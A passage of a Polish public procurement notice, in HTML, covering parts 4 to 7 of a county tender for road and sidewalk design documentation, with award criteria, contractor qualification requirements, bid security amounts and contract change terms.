kryterium: <span class="normal">˜Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">˜Doświadczenie Projektanta branży drogowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> ˜Oferty ocenianie będą punktowo dla każdego kryterium oddzielnie. O wyborze najkorzystniejszej oferty zdecyduje największa liczba zdobytych punktów łącznie we wszystkich kryteriach. Ocenie będą podlegać wyłącznie oferty niepodlegające odrzuceniu. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc Po przecinku, zgodnie z zasadami arytmetyki. <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> ˜Zadanie Nr 4: Opracowanie dokumentacji projektowej na budowę chodnika w ciągu drogi powiatowej Nr 1518N od km 3+245 do km 3+445 w m. Karwica wraz z przygotowaniem wniosku o wydanie decyzji pozwolenia na budowę;Stan istniejącyDroga powiatowa Nr 1518N Kokoszki – Faryny – Karwica – Krzyże na odcinku od km 3+245 do km 3+445 posiada nawierzchnię bitumiczną o szerokości ok. 4 m, stan nawierzchni – zadowalający, pobocza gruntowe uzupełnione destruktem asfaltowym.Stan projektowany- Początek opracowania – km 3+245 – strona prawa,- Koniec opracowania – km 3+445 – strona prawa,- Kategoria drogi – powiatowa,- Klasa drogi – Z,- Kategoria ruchu – KR 2,- Szerokość chodnika – 2,00 m,- Nawierzchnia chodnika – kostka betonowa grubości 8 cm,- Nawierzchnia zjazdów – kostka betonowa grubości 8 cm, - W przypadku stwierdzenia na projektowanym odcinku budowy chodnika kolizji z istniejącą infrastrukturą techniczną należy zaprojektować przebudowę obiektów oraz urządzeń obcych infrastruktury technicznej znajdujących się w liniach rozgraniczających teren inwestycji.Kilometraż podany przez Zamawiającego należy traktować jako orientacyjny. Szczegółowe pomiary w trakcie opracowywania dokumentacji przez projektanta mają wskazać kilometraż rzeczywisty, który będzie miał odbicie w opracowanej dokumentacji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">˜5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">˜Oferty ocenianie będą punktowo dla każdego kryterium oddzielnie. O wyborze najkorzystniejszej oferty zdecyduje największa liczba zdobytych punktów łącznie we wszystkich kryteriach. Ocenie będą podlegać wyłącznie oferty niepodlegające odrzuceniu. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc Po przecinku, zgodnie z zasadami arytmetyki.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">˜Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">˜Doświadczenie Projektanta branży drogowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> ˜Oferty ocenianie będą punktowo dla każdego kryterium oddzielnie. O wyborze najkorzystniejszej oferty zdecyduje największa liczba zdobytych punktów łącznie we wszystkich kryteriach. Ocenie będą podlegać wyłącznie oferty niepodlegające odrzuceniu. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc Po przecinku, zgodnie z zasadami arytmetyki. <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> ˜Zadanie Nr 5: Opracowanie dokumentacji projektowej na przebudowę drogi powiatowej Nr 1684N od km 3+535 do km 4+255 w m. Włosty wraz z przygotowaniem zgłoszenia robót budowlanych niewymagających pozwolenia na budowę;Stan istniejącyDroga powiatowa Nr 1684N DK Nr 58 (Świdry) – Łodygowo – Włosty – DP Nr 1680N na odcinku od km 3+535 do km 4+255 posiada nawierzchnię brukowcową o szerokości ok. 3÷3,5 m i pobocza gruntowe, stan nawierzchni i poboczy – niezadowalający.Stan projektowany- Początek opracowania – km 3+535,- Koniec opracowania – km 4+255,- Kategoria drogi – powiatowa,- Klasa drogi – L,- Kategoria ruchu – KR 2,- Szerokość jezdni – 5,50 m,- Nawierzchnia jezdni – beton asfaltowy,- Szerokość poboczy – 2 x 0,75 m,- Nawierzchnia poboczy – kruszywo łamane,- Nawierzchnia zjazdów do istniejących posesji – beton asfaltowy,- W przypadku stwierdzenia na projektowanym odcinku budowy chodnika kolizji z istniejącą infrastrukturą techniczną należy zaprojektować przebudowę obiektów oraz urządzeń obcych infrastruktury technicznej znajdujących się w liniach rozgraniczających teren inwestycji.Kilometraż podany przez Zamawiającego należy traktować jako orientacyjny. Szczegółowe pomiary w trakcie opracowywania dokumentacji przez projektanta mają wskazać kilometraż rzeczywisty, który będzie miał odbicie w opracowanej dokumentacji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">˜5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">˜Oferty ocenianie będą punktowo dla każdego kryterium oddzielnie. O wyborze najkorzystniejszej oferty zdecyduje największa liczba zdobytych punktów łącznie we wszystkich kryteriach. Ocenie będą podlegać wyłącznie oferty niepodlegające odrzuceniu. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc Po przecinku, zgodnie z zasadami arytmetyki.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">˜Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">˜Doświadczenie Projektanta branży drogowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> ˜Oferty ocenianie będą punktowo dla każdego kryterium oddzielnie. O wyborze najkorzystniejszej oferty zdecyduje największa liczba zdobytych punktów łącznie we wszystkich kryteriach. Ocenie będą podlegać wyłącznie oferty niepodlegające odrzuceniu. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc Po przecinku, zgodnie z zasadami arytmetyki. <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> ˜Zadanie Nr 6: Opracowanie dokumentacji projektowej na przebudowę drogi powiatowej Nr 1686N od km 0+300 do km 2+757 w m. Karwik wraz z przygotowaniem wniosku o wydanie decyzji zezwalającej na realizację inwestycji drogowej;Stan istniejącyDroga powiatowa Nr 1686N Karwik – DK Nr 63 (Jeglin) na odcinku od km 0+300 do km 2+757 posiada nawierzchnię bitumiczną o szerokości ok. 3,4 m i pobocza gruntowe, stan nawierzchni – zadowalający.Stan projektowany- Początek opracowania – km 0+300,- Koniec opracowania – km 2+757,- Kategoria drogi – powiatowa,- Klasa drogi – L,- Kategoria ruchu – KR 2,- Szerokość jezdni – 5,50 m,- Nawierzchnia jezdni – beton asfaltowy,- Szerokość poboczy – 2 x 0,75 m poza terenem zabudowanym,- Szerokość pobocza – 0,75 m w terenie zabudowanym,- Ciąg pieszo – rowerowy o szerokości – 3,00 m w terenie zabudowanym (w miejscu występowania przeszkody dopuszcza się zmniejszenie szerokości do 2,0 m),- Nawierzchnia ciągu pieszo – rowerowego i zatok autobusowych – kostka betonowa grubości 8 cm,- Kanał technologiczny,- W przypadku stwierdzenia na projektowanym odcinku budowy chodnika kolizji z istniejącą infrastrukturą techniczną należy zaprojektować przebudowę obiektów oraz urządzeń obcych infrastruktury technicznej znajdujących się w liniach rozgraniczających teren inwestycji.Kilometraż podany przez Zamawiającego należy traktować jako orientacyjny. Szczegółowe pomiary w trakcie opracowywania dokumentacji przez projektanta mają wskazać kilometraż rzeczywisty, który będzie miał odbicie w opracowanej dokumentacji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">˜5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">˜Oferty ocenianie będą punktowo dla każdego kryterium oddzielnie. O wyborze najkorzystniejszej oferty zdecyduje największa liczba zdobytych punktów łącznie we wszystkich kryteriach. Ocenie będą podlegać wyłącznie oferty niepodlegające odrzuceniu. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc Po przecinku, zgodnie z zasadami arytmetyki.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">˜Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">˜Doświadczenie Projektanta branży drogowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> ˜Oferty ocenianie będą punktowo dla każdego kryterium oddzielnie. O wyborze najkorzystniejszej oferty zdecyduje największa liczba zdobytych punktów łącznie we wszystkich kryteriach. Ocenie będą podlegać wyłącznie oferty niepodlegające odrzuceniu. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc Po przecinku, zgodnie z zasadami arytmetyki. <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> ˜Zadanie Nr 7: Opracowanie dokumentacji projektowej na przebudowę drogi powiatowej Nr 1702N od km 5+980 do km 6+155 w m. Czarne wraz z przygotowaniem zgłoszenia robót budowlanych niewymagających pozwolenia na budowę;Stan istniejącyDroga powiatowa Nr 1702N DK Nr 63 – Odoje – Czarne – granica powiatu na odcinku od km 5+980 do km 6+155 posiada nawierzchnię brukowcową o szerokości ok. 4 m i pobocza gruntowe, stan nawierzchni i poboczy – zadowalający. Z prawej strony drogi na odcinku ok. 120 m zlokalizowany jest chodnik o szerokości 1,3 m z kostki betonowej. Stan projektowany- Początek opracowania – km 5+980,- Koniec opracowania – km 6+155,- Kategoria drogi – powiatowa,- Klasa drogi – Z,- Kategoria ruchu – KR 2,- Szerokość jezdni – 5,50 m,- Nawierzchnia jezdni – beton asfaltowy,- Szerokość poboczy – 2 x 0,75 m,- Chodnik o szerokości 1,5 m i nawierzchni z kostki betonowej (kostka betonowa z rozbiórki istniejącego chodnika),- W przypadku stwierdzenia na projektowanym odcinku budowy chodnika kolizji z istniejącą infrastrukturą techniczną należy zaprojektować przebudowę obiektów oraz urządzeń obcych infrastruktury technicznej znajdujących się w liniach rozgraniczających teren inwestycji.Kilometraż podany przez Zamawiającego należy traktować jako orientacyjny. Szczegółowe pomiary w trakcie opracowywania dokumentacji przez projektanta mają wskazać kilometraż rzeczywisty, który będzie miał odbicie w opracowanej dokumentacji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">˜3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">˜Oferty ocenianie będą punktowo dla każdego kryterium oddzielnie. O wyborze najkorzystniejszej oferty zdecyduje największa liczba zdobytych punktów łącznie we wszystkich kryteriach. Ocenie będą podlegać wyłącznie oferty niepodlegające odrzuceniu. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc Po przecinku, zgodnie z zasadami arytmetyki.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">˜Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">˜Doświadczenie Projektanta branży drogowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> ˜Oferty ocenianie będą punktowo dla każdego kryterium oddzielnie. O wyborze najkorzystniejszej oferty zdecyduje największa liczba zdobytych punktów łącznie we wszystkich kryteriach. Ocenie będą podlegać wyłącznie oferty niepodlegające odrzuceniu. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc Po przecinku, zgodnie z zasadami arytmetyki. <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> ˜O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:1)	zdolności do występowania w obrocie gospodarczym „Nie dotyczy”2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: „Nie dotyczy”3)	sytuacji ekonomicznej lub finansowej: „Nie dotyczy”4)	zdolności technicznej lub zawodowej:a)	dotyczącej Wykonawcy:Wykonawca musi wykazać się wiedzą i doświadczeniem, w wykonaniu (zakończeniu) w okresie ostatnich 10 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, usług polegających na:opracowaniu Projektu Budowlanego dla budowy lub przebudowy lub rozbudowy drogi/dróg klasy min Z lub ronda/skrzyżowania na drodze klasy min. Z lub węzła drogowego na drodze klasy min. Z, gdzie w ramach zadania uzyskano decyzję o zgodzie na realizację inwestycji drogowej /decyzję pozwolenia na budowę/ dokument równoważny, który umożliwił realizację robót budowlanych na podstawie opracowanej dokumentacji projektowej, w przypadku inwestycji wykonywanych poza obszarem RP.Przez wykonanie (zakończenie) należy rozumieć Protokół odbioru dokumentacji projektowej lub równoważny dokument.b)	dotyczącej osób:Wykonawca musi wskazać osoby, które zostaną skierowane przez Wykonawcę do realizacji zamówienia, legitymujące się kwalifikacjami zawodowymi, uprawnieniami, doświadczeniem, wykształceniem niezbędnym do wykonania zamówienia.Wykonawca, na każdą funkcję wymienioną poniżej, wskaże osoby, które musi mieć dostępne na etapie realizacji zamówienia, spełniające następujące wymagania:Projektant branży drogowej:a)	wymagana liczba osób: 1b)	wymagane kwalifikacje zawodowe i doświadczenie:1.	Uprawnienia budowlane w specjalności drogowej do projektowania bez ograniczeń lub równoważne wydane na podstawie obowiązujących wcześniej przepisów;2.	Posiada doświadczenie na stanowisku Projektanta branży drogowej lub Sprawdzającego dokumentację branży drogowej przy opracowaniu Projektu Budowlanego polegającego na budowie lub rozbudowie drogi/dróg klasy min Z lub ronda/skrzyżowania na drodze klasy min. Z lub węzła drogowego na drodze klasy min. Z, gdzie dla zadania uzyskano decyzję o zgodzie na realizację inwestycji drogowej/ decyzję pozwolenia na budowę/ dokument równoważny, który umożliwił realizację robót budowlanych na podstawie opracowanej dokumentacji projektowej, w przypadku inwestycji wykonywanej poza obszarem RP. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">˜W celu potwierdzenia spełniania przez Wykonawcę warunków udziału wpostępowaniu Wykonawca składa:a) wykazu usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 10 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, októrych mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadalwykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy;b) wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją opodstawie do dysponowania tymi osobami;</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> ˜Wraz z Ofertą Wykonawca zobowiązany jest złożyć za pośrednictwem Platformy:1) odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru, chyba że Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych a Wykonawca w Formularzu Oferty wskazał dane umożliwiające dostęp do tych dokumentów w odniesieniu do Wykonawcy, Wykonawcy wspólnie ubiegającego się o zamówienie, jak również w odniesieniu do podmiotów udostępniających zasoby; w przypadku wskazania przez Wykonawcę dostępności ww. dokumentów pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz danych, Zamawiający może żądać od Wykonawcy przedstawienia tłumaczenia na język polski pobranych samodzielnie przez Zamawiającego dokumentów;2) pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy lub podmiotu udostępniającego zasoby chyba, że umocowanie do reprezentacji wynika z dokumentów, o których mowa w pkt. 16.6. ppkt 1) IDW;3) pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. umowa o współdziałaniu). Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy;4) oryginał gwarancji lub poręczenia, jeśli wadium wnoszone jest w innej formie niż pieniądz, z uwzględnieniem postanowień pkt. 18.3. IDW;5) zobowiązania wymagane postanowieniami pkt. 11.3. IDW, w przypadku gdy Wykonawca polega na zdolnościach podmiotów udostępniających zasoby w celu potwierdzenia spełniania warunków udziału w postępowaniu wraz z pełnomocnictwami, jeżeli prawo do podpisania danego zobowiązania nie wynika z dokumentów, o których mowa w pkt. 16.6. ppkt 1) IDW;6) oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia, o którymmowa w art. 117 ust. 4 ustawy Pzp;7) oświadczenie wymagane postanowieniami pkt. 10.2., 11.9. i 13.3. IDW. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> ˜Wykonawca jest zobowiązany do wniesienia wadium w wysokości:1)	Część 1 – Zadanie Nr 1: 600,00 zł (sześćset złotych 00/100);2)	Część 2 – Zadanie Nr 2: 2 400,00 zł (dwa tysiące czterysta złotych 00/100);3)	Część 3 – Zadanie Nr 3: 200,00 zł (dwieście złotych 00/100);4)	Część 4 – Zadanie Nr 4: 200,00 zł (dwieście złotych 00/100);5)	Część 5 – Zadanie Nr 5: 1 800,00 zł (jeden tysiąc osiemset złotych 00/100);6)	Część 6 – Zadanie Nr 6: 4 500,00 zł (cztery tysiące pięćset złotych 00/100);7)	Część 7 – Zadanie Nr 7: 200,00 zł (dwieście złotych 00/100). <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> ˜1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać wykluczeniu na podstawie art. 108 ust. 1 ustawy Pzp, natomiast spełnianie warunków udziału w postępowaniu Wykonawcy wykazują zgodnie z pkt 8.2. IDW.3. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o którym mowa w pkt. 10.2 IDW składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.4. W przypadku, gdy spełnienie warunku opisanego:1) w pkt. 8.2.4) IDW wykazuje co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia2) w pkt. 8.2.4) IDW wykonawcy wykazują poprzez poleganie na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.3) wykonawcy wspólnie ubiegający się o udzielenie zamówienia oświadczają które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy.5. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców są oni zobowiązani na wezwanie Zamawiającego złożyć aktualne na dzień złożenia podmiotowe środki dowodowe, o których mowaw pkt 10 IDW, przy czym:1) podmiotowe środki dowodowe o których mowa w pkt 10.7. IDW składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/ą spełnianie warunku, w zakresie i na zasadachopisanych w pkt 8.2 IDW; <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> ˜Zamawiający informuje, że zmiana terminu (skrócenie lub wydłużenie) może nastąpić w przypadku:1) niezłożenia przez Zamawiającego wniosku o wydanie decyzji o środowiskowych uwarunkowaniach z przyczyn niezależnych od Wykonawcy, w terminie 24 miesięcy od dnia odbioru przez Zamawiającego poprawionych opracowań;2) udzielenia Wykonawcy zamówienia dodatkowego / uzupełniającego - wydłużenie terminu trwania zamówienia o uzgodniony z Zamawiającym rzeczywisty czas potrzebny do wykonania przez Wykonawcę prac dodatkowych / uzupełniających;3) przekroczenia, wyłącznie z przyczyn niezależnych od Wykonawcy i mających wpływ na wykonanie przedmiotu umowy lub jego poszczególnych etapów, przewidzianych przepisami prawa terminów trwania procedur administracyjnych, liczonych zgodnie z zasadami określonymi w przepisach prawa, w tym w kodeksie postępowania administracyjnego - wydłużenie terminu trwania zamówienia o udokumentowaną ilość tych dni (liczone od dnia, w którym decyzja powinna być wydana zgodnie z procedurami administracyjnymi do dnia faktycznego wydania decyzji);4) wydłużenia terminu trwania zamówienia - do uzgodnienia z Zamawiającym termin odzwierciedlający potrzebny czas na wprowadzenie zmian;5) zmiany terminu trwania zamówienia — w przypadku gdy czas uzyskiwania decyzji o środowiskowych uwarunkowaniach oraz czas uzyskiwania decyzji o 